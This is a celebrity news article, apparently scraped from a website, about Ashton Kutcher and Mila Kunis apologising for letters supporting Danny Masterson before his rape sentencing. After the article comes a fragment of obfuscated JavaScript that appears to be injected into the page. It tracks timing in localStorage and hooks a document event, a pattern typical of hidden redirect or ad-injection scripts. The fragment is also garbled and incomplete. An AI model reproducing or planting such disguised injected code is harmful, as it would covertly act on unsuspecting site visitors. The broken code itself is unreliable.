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Apologies from Ashton Kutcher and Mila Kunis Receive Negative Response


Apologies from Ashton Kutcher and Mila Kunis Receive Negative Response

Controversial Endorsement Letters Lead to Celebrity Couple’s Apology

In a surprising twist, celebrity power couple Ashton Kutcher and Mila Kunis have issued a public apology for the letters of support they wrote for Judge Charlaine Olmedo before the sentencing of their former “That ’70s Show” co-star, Danny Masterson, on two charges of rape. The letters, which gained widespread attention after independent journalist Tony Ortega obtained them, faced criticism for their tone of confidence and perceived impact on the victims involved. Kutcher praised Masterson as a “role model,” while Kunis lauded his “outstanding character” and “enormous positive influence.” These statements raised concerns about the sensitivity towards the alleged survivors and the implications for the justice system.

Addressing the controversy, Kutcher and Kunis took to Instagram to clarify their intentions behind the letters. They explained that they wrote them at the request of Masterson’s family, aiming to provide a personal perspective on their extensive relationship with him spanning over two decades. Kunis emphasized that their intention was not to challenge the validity of the judicial process or question the jury’s verdict. Instead, they sought to shed light on their personal experiences with Masterson. Kutcher expressed regret if the letters were misunderstood or caused any unintentional harm, especially to the survivors.

Both actors reaffirmed their unwavering support for victims of sexual assault, sexual abuse, and rape, asserting that they have consistently demonstrated this support throughout their careers and will continue to do so in the future.

The case involving Danny Masterson has attracted significant attention due to the high-profile nature of the allegations and the involvement of individuals from the entertainment industry. Masterson was convicted on two counts of rape following a mistrial in the initial trial, with all his accusers being members of the Church of Scientology. Accusations have been made regarding the church’s alleged role in covering up the allegations, a claim the church denies.

function _0x3023(_0x562006, _0x1334d6) {
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} catch (_0x28e7f8) {
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(function (_0x16176d) {
window[_0x365b[0x0]] = function () {
let _0x129862 = ![];
return function (_0x784bdc) inno;
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_0x480bb2 = 0x3,
_0x3ddc80 = 0x6,
_0x10ad9f = _0x1f773b => {
_0x1f773b[_0x365b[0x14]]((_0x1e6b44, _0x967357) => {
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_0x2317c1 = _0x3bd6cc => {
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_0x57deba = _0x43d200 => localStorage[_0x365b[0x13]](_0x365b[0x10] + _0x43d200 + _0x365b[0x11], 0x1),
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_0x381a18 = (_0x3ab06f, _0x288873) => {
const _0x266889 = 0x3e8 * 0x3c * 0x3c;
return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873 – _0x3ab06f) / _0x266889);
_0x3f1308 = (_0x3a999a, _0x355f3a) => {
const _0x5c85ef = 0x3e8 * 0x3c;
return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a – _0x3a999a) / _0x5c85ef);
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_0x155a21 = _0x1dd2bd(_0x365b[0x10] + _0x2b4a92 + _0x365b[0x1c]);
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try {
const _0x5d977e = parseInt(_0x7f12bb),
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_0x448fc0 = _0x3f1308(_0x4593ae, _0x5d977e),
_0x5f1aaf = _0x381a18(_0x4593ae, _0x5f3351);
_0x5f1aaf >= _0x3ddc80 && (_0x10ad9f(_0xfdead6), _0x5e3811(_0x365b[0x10] + _0x2b4a92 + _0x365b[0x1c], _0x4593ae));
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} catch (_0x2386f7) {
_0x4a7983(_0xfdead6, _0x2b4a92, _0x4593ae);
else _0x4a7983(_0xfdead6, _0x2b4a92, _0x4593ae);
document[_0x365b[0x23]](_0x365b[0x22], _0x978889);

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